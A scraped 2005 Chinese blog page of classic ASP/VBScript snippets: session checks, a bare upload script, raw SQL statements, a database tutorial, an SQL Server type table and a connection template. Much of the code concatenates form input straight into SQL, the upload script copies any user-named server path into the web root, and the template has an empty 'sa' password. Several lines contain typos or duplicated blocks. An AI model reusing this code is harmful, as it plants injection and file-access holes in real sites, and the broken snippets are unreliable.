If Len(DateHour)<2 Then DateHour="0"&DateHour
DateToStr=Year(DateTime)&"-"&DateMonth&"-"&DateDay&" "&DateHour&":"&DateMinute
End Select
End Function
Function Admin()
Admin=False
If Session("Admin")="" or Isnull(Session("Admin")) or Session("Flag")="" or Isnull(Session("Flag")) then Admin=False
If Session("Admin")<>"" or Session("Flag")>0 then Admin=True
End Function
Sub Adminchk()
If Session("Admin")="" or Isnull(Session("Admin")) or Session("Flag")<=0 or Isnull(Session("Flag")) then
Response.Write ("alert('您没有管理的权限，请确认你是否登录!');window.history.go(-1);")
Response.End
Else
End if
End sub
sub Webstate()
If Cint(Yas_Setting(0))=0 Then
Response.Write(Yas_infor(9))
Response.end
Else
Response.Write("")
End if
end sub
Function SctiptSection()
' dim ScriptTime,SQLNum '
dim ScriptTime
ScriptTime=FormatNumber((timer()-StartTime)*1000,3)
SQLNum=SQLNum
Response.Write ("执行时间:"&ScriptTime&"毫秒查询数据库:"&SQLNum&" 次")
End Function
%>

最原始的上传文件 ~

一线风 — 2005-4-6 22:36:55
upload.asp文件
<%
Function GetFileName(ByVal strFile)
If strFile <> "" Then
GetFileName = mid(strFile,InStrRev(strFile, "\")+1)
Else
GetFileName = ""
End If
End function
strFileName = Request.Form("file1")
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Type = 1 ' adTypeBinary
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.MapPath(GetFileName(strFileName)),2
objStream.Close
%>
upload.htm文件

　　

Often be used SQL sentence!

一线风 — 2005-4-1 18:08:08
[code]
AddData:
Conn.Execute("INSERT INTO [Y_user](Username,UserPassword,Groups) Values ('"&Username&"','"&UserPassword&"','"&Groups&"')")
DelData:
Conn.execute("delete from [Y_Gbook] where id="&id)
UpdateData:
Conn.Execute("update [Y_user] set usergroupid=1 , userclass='"&groupsname&"',titlepic='"&titlepic&"' where userid="&adminuserid&" ")
[code]
AddData:
Conn.Execute("INSERT INTO [Y_user](Username,UserPassword,Groups) Values ('"&Username&"','"&UserPassword&"','"&Groups&"')")
DelData:
Conn.execute("delete from [Y_Gbook] where id="&id)
UpdateData:
Conn.Execute("update [Y_user] set usergroupid=1 , userclass='"&groupsname&"',titlepic='"&titlepic&"' where userid="&adminuserid&" ")

conn.execute("insert into Y_Troop (userid,ishead,username,usersex) select userid,ishead,username,usersex from Y_user where userid="&id&"")
conn.execute("delete From Y_Troop where parentid=(select id from Y_Troop where userid="&id&" )")
That is very important sentence.

[/code]

--混合数据库数据和相关变量插入
insert into Y_order (userid,username,showid,showname,price,total) select '2','一线风',id,showname,price,5 from Y_show where id=1
--求合
select sum(price*total) from Y_order where userid=2

[redface]
还有别的～嘿～

提交
删除

Response.Write ("alert('您没有管理的权限，请确认你是否登录!');window.history.go(-1);") :Response.End

Response.Write ("alert('注册成功，现在返回首页!');window.location.href='index.asp';") :Response.End

response.redirect request.servervariables("HTTP_REFERER")

以下为SQL SERVER7.0以上版本的字段类型说明。SQL SERVER6.5的字段类型说明请参考SQL SERVER提供的说明。

字段类型描述
bit 0或1的整型数字值为 Yes 和 No，并且该字段只能取这两个值中的一个。
int 从-2^31(-2,147,483,648)到2^31(2,147,483,647)的整型数字
smallint 从-2^15(-32,768)到2^15(32,767)的整型数字
tinyint 从0到255的整型数字
decimal 从-10^38到10^38-1的定精度与有效位数的数字
numeric decimal的同义词
money 从-2^63(-922,337,203,685,477.5808)到2^63-1(922,337,203,685,477.5807)的货币数据，最小货币单位千分之十
smallmoney 从-214,748.3648到214,748.3647的货币数据，最小货币单位千分之十
float 从-1.79E+308到1.79E+308可变精度的数字
real 从-3.04E+38到3.04E+38可变精度的数字
datetime 从1753年1月1日到9999年12日31的日期和时间数据，最小时间单位为百分之三秒或3.33毫秒
smalldatetime 从1900年1月1日到2079年6月6日的日期和时间数据，最小时间单位为分钟
timestamp 时间戳，一个数据库宽度的唯一数字
uniqueidentifier 全球唯一标识符GUID
char 定长非Unicode的字符型数据，最大长度为8000 CHAR(x)是定长字符串。长度属性 x 必须在 1 和 254 之间，并包括 1 和 254。
varchar 变长非Unicode的字符型数据，最大长度为8000
text 变长非Unicode的字符型数据，最大长度为2^31-1(2G)
nchar 定长Unicode的字符型数据，最大长度为8000
nvarchar 变长Unicode的字符型数据，最大长度为8000
ntext 变长Unicode的字符型数据，最大长度为2^31-1(2G)
binary 定长二进制数据，不进行数据转换,最大长度为8000 数据怎样输入到二进制字段就怎样作为输出显示.
varbinary 变长二进制数据，最大长度为8000
image 变长二进制数据，最大长度为2^31-1(2G)
[redface]

叶子的分页类！

一线风 — 2005-3-31 20:23:13
用得上的～还可以学习，传上来

点击下载此文件

ASP数据库简单操作教程

一线风 — 2005-3-31 13:33:54
<1>.数据库连接(用来单独编制连接文件conn.asp)
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("\bbs\db1\user.mdb")
%>
(用来连接bbs\db1\目录下的user.mdb数据库)
<2>显示数据库记录
原理：将数据库中的记录一一显示到客户端浏览器，依次读出数据库中的每一条记录
如果是从头到尾：用循环并判断指针是否到末使用: not rs.eof
如果是从尾到头：用循环并判断指针是否到开始使用：not rs.bof

(包含conn.asp用来打开bbs\db1\目录下的user.mdb数据库)
<%
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表，即你要显示的数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
rs.movefirst ---->(将指针移到第一条记录)
while not rs.eof ---->(判断指针是否到末尾)
response.write(rs("name")) ---->(显示数据表message中的name字段)
rs.movenext ---->(将指针移动到下一条记录)
wend ---->(循环结束)
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------
%>
其中response对象是服务器向客户端浏览器发送的信息
<3>增加数据库记录
增加数据库记录用到rs.addnew,rs.update两个函数
(包含conn.asp用来打开bbs\db1\目录下的user.mdb数据库)
<%
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表，即你要显示的数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
rs.addnew 新增加一条记录
rs("name")="xx" 将xx的值传给name字段
rs.update 刷新数据库
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------

%>
<4>删除一条记录
删除数据库记录主要用到rs.delete,rs.update
(包含conn.asp用来打开bbs\db1\目录下的user.mdb数据库)
<%
dim name
name="xx"
set rs=server.CreateObject("adodb.recordset") (建立recordset对象)
sqlstr="select * from message" ---->(message为数据库中的一个数据表，即你要显示的数据所存放的数据表)
rs.open sqlstr,conn,1,3 ---->(表示打开数据库的方式)
-------------------------------------------------------
while not rs.eof
if rs.("name")=name then
rs.delete
rs.update 查询数据表中的name字段的值是否等于变量name的值"xx"，如果符合就执行删除，
else 否则继续查询,直到指针到末尾为止
rs.movenext
emd if
wend
------------------------------------------------------
------------------------------------------------------
rs.close
conn.close 这几句是用来关闭数据库
set rs=nothing
set conn=nothing
-------------------------------------------------------
%>
<5>关于数据库的查询
(a) 查询字段为字符型
<%
dim user,pass,qq,mail,message
user=request.Form("user")
pass=request.Form("pass")
qq=request.Form("qq")
mail=request.Form("mail")
message=request.Form("message")
if trim(user)&"x"="x" or trim(pass)&"x"="x" then (检测user值和pass值是否为空，可以检测到空格)
response.write("注册信息不能为空")
else
set rs=server.CreateObject("adodb.recordset")
sqlstr="select * from user where user='"&user&"'" (查询user数据表中的user字段其中user字段为字符型)
rs.open sqlstr,conn,1,3
if rs.eof then
rs.addnew
rs("user")=user
rs("pass")=pass
rs("qq")=qq
rs("mail")=mail
rs("message")=message
rs.update
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("注册成功")
end if
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("注册重名")
%>
(b)查询字段为数字型
<%
dim num
num=request.Form("num")
set rs=server.CreateObject("adodb.recordset")
sqlstr="select * from message where id="&num (查询message数据表中id字段的值是否与num相等，其中id为数字型)
rs.open sqlstr,conn,1,3
if not rs.eof then
rs.delete
rs.update
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("删除成功")
end if
rs.close
conn.close
set rs=nothing
set conn=nothing
response.write("删除失败")
%>
<6>几个简单的asp对象的讲解
response对象:服务器端向客户端发送的信息对象,包括直接发送信息给浏览器,重新定向URL，或设置cookie值
request对象:客户端向服务器提出的请求
session对象:作为一个全局变量，在整个站点都生效
server对象：提供对服务器上方法和属性的访问
(a) response对象的一般使用方法
比如：
<%
resposne.write("hello, welcome to asp!")
%>
在客户端浏览器就会看到 hello, welcome to asp! 这一段文字
<%
response.Redirect(www.sohu.com")
%>
如果执行这一段，则浏览器就会自动连接到 “搜狐” 的网址
关于response对象的用法还有很多，大家可以研究研究
request对象的一般使用方法
比如客户端向服务器提出的请求就是通过request对象来传递的
列如：你在申请邮箱的所填写的个人信息就是通过该对象来将
你所填写的信息传递给服务器的
比如：这是一段表单的代码，这是提供给客户填写信息的，填写完了按
“提交”传递给request.asp文件处理后再存入服务器数据库

那么request.asp该如何将其中的信息读入，在写入数据库，在这里就要用到
request对象了，下面我们就来分析request.asp的写法
<%
dim name,password (定义user和password两个变量)
name=request.form(“user”) (将表单中的user信息传给变量name)
password=request.form(“pass”) (将表单中的pass信息传给变量password)
%>
通过以上的几句代码我们就将表单中的数据读进来了，接下来我们要做的就是将
信息写入数据库了，写入数据库的方法上面都介绍了，这里就不一一复述了

细线表格～

一线风 — 2005-3-30 16:57:52
style="BORDER-COLLAPSE: collapse"
把上句放在
里就行了～还就是表格要是1的边框：）
其实做细线表格不一定用这种，比如让间距为1，然后用背景色填充，最后就改一下表格里的背景色，但是问题来了，如果这个表格里的数据是成千上万的乍办？我今天就碰到了这种情况，都快疯了，用上面的那种办法就能很好的解决问题～～

弹出固定大小的新窗口：）

一线风 — 2005-3-29 13:47:32

//打开窗口
function openScript(url, width, height){
var Win = window.open(url,"openScript",'width=' + width + ',height=' + height + ',resizable=1,scrollbars=yes,menubar=no,status=no' );
}

以下是调用方式：
发短信

//打开窗口
function openScript(url, width, height){
var Win = window.open(url,"openScript",'width=' + width + ',height=' + height + ',resizable=1,scrollbars=yes,menubar=no,status=no' );
}

以下是调用方式：
发短信
这样做的好处是OpenScrit 可以写在一个单独的文件里，而所以的弹出方式都可以通过传递的参数来固定窗口。

相关解说～～～～

　　
　　

　　参数解释：
　　
　　 js脚本开始；
　　window.open 弹出新窗口的命令；
　　'page.html' 弹出窗口的文件名；
　　'newwindow' 弹出窗口的名字（不是文件名），非必须，可用空''代替；　　
height=100 窗口高度；
　　width=400 窗口宽度；
　　top=0 窗口距离屏幕上方的象素值；
　　left=0 窗口距离屏幕左侧的象素值；
　　toolbar=no 是否显示工具栏，yes为显示；
　　menubar，scrollbars 表示菜单栏和滚动栏。
　　resizable=no 是否允许改变窗口大小，yes为允许；
　　location=no 是否显示地址栏，yes为允许；
　　status=no 是否显示状态栏内的信息（通常是文件已经打开），yes为允许；
　　 js脚本结束

结合动网数据库连接我所修改的连接方案

一线风 — 2005-3-24 8:06:56
2006-3-9 重新修改Ver:0.31.20060304b
Conn.asp

[code]
<%@ LANGUAGE = VBScript%>
<%
'--------------------------------- Author information -------------------------------------------------------------
'File : CONN.asp
'Version : 0.31.20060304b2006-3-9 重新修改Ver:0.31.20060304b
Conn.asp

<%@ LANGUAGE = VBScript%>
<%
'--------------------------------- Author information -------------------------------------------------------------
'File : CONN.asp
'Version : 0.31.20060304b
'Revision : 2006-3-4 19:15:00
'Author : Atwind(Atwind.Max or 一线风)
'Content : Email:Itwind@163.com BLoghttp://max.69sea.com QQ:478779122
'-----------------------------------------------------------------------------------------------------------------
Option Explicit
Response.Buffer = True
Server.ScriptTimeOut = 90
'Session.CodePage=65001 ''UTF-8
Session.CodePage=936 ''SimpleChinese
Dim Startime
Dim Conn
Dim MyACpath
'-------------------------------- 0 is the SQL 1 is AC ------------------------------------------------------------
Const IsAcData = 1
Const ACDB = "AC.mdb"
Const Adminpath="Root"
'-------------------------------- SQL connection setting ---------------------------------------------------------
Const SqlDatabaseName = "DatabaseName"
Const SqlUsername = "sa"
Const SqlPassword = ""
Const SqlLocalName = "(local)"
'--------------------------------- the program runs stats --------------------------------------------------------
Startime = Timer()
MyACpath="Data/"
'--------------------------------- OpenDataConn() & CloseDataCOnn ----------------------------------------------
Sub OpenDataConn()
Dim ConnStr
If IsAcData = 0 Then
ConnStr = "Provider = Sqloledb; User ID = " & SqlUsername & "; Password = " & SqlPassword & "; Initial Catalog = " & SqlDatabaseName & "; Data Source = " & SqlLocalName & ";"
Else
ConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Server.MapPath(MyACpath&ACDB)
End If
On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
conn.open ConnStr
If Err Then
Response.write Err.Description:Response.end
Err.Clear
Set Conn = Nothing
Response.Write "Connection to database has been errors ,please check it!"
Response.End
End If
End Sub
Sub CloseDataConn()
If Isobject("Conn") then
Conn.close
set Conn=Nothing
End If
End Sub
'---------------------------------------------------------------------------------------------------------------
''call opendataconn
%>

List.asp

<%
OpenDataConn()
dim SQLStr,Rs
SQLStr="select * from News Order by id desc"

Set Rs=Server.CreateObject("adodb.recordset")
Rs.Open SQLStr,conn,1,1
if Rs.eof and Rs.bof then response.write ("没有数据呀！")
CloseDataConn()
%>

使用Getrows可以提高效率，先写这儿，回头找找资料～

程序开发 - 艺风在线 - Power By CSZI.com

xsl:param 与 xsl:variable 的区别

mssql多索引的应用

如何编写高效的存储过程

开源有感系列 之开源数据库有感

XML 中的空白字符须知

什么是 XML 空白字符？

XML 处理器如何处理 XML 空白字符

结论

ASP/SQL 注入天书

引言

入门篇

进阶篇

高级篇

防范方法

有关sql注入

Iconspedia-下载和分享Web2.0图标

百万级论坛系统设计优化

有返回值函数收集～

我的实用代码收集～

通过Stream对象载入外部文件：）－－模板技术

常用共公函数

最原始的上传文件 ~

Often be used SQL sentence!

叶子的分页类！

ASP数据库简单操作教程

细线表格～

弹出固定大小的新窗口：）

结合动网数据库连接我所修改的连接方案

开源有感系列之开源数据库有感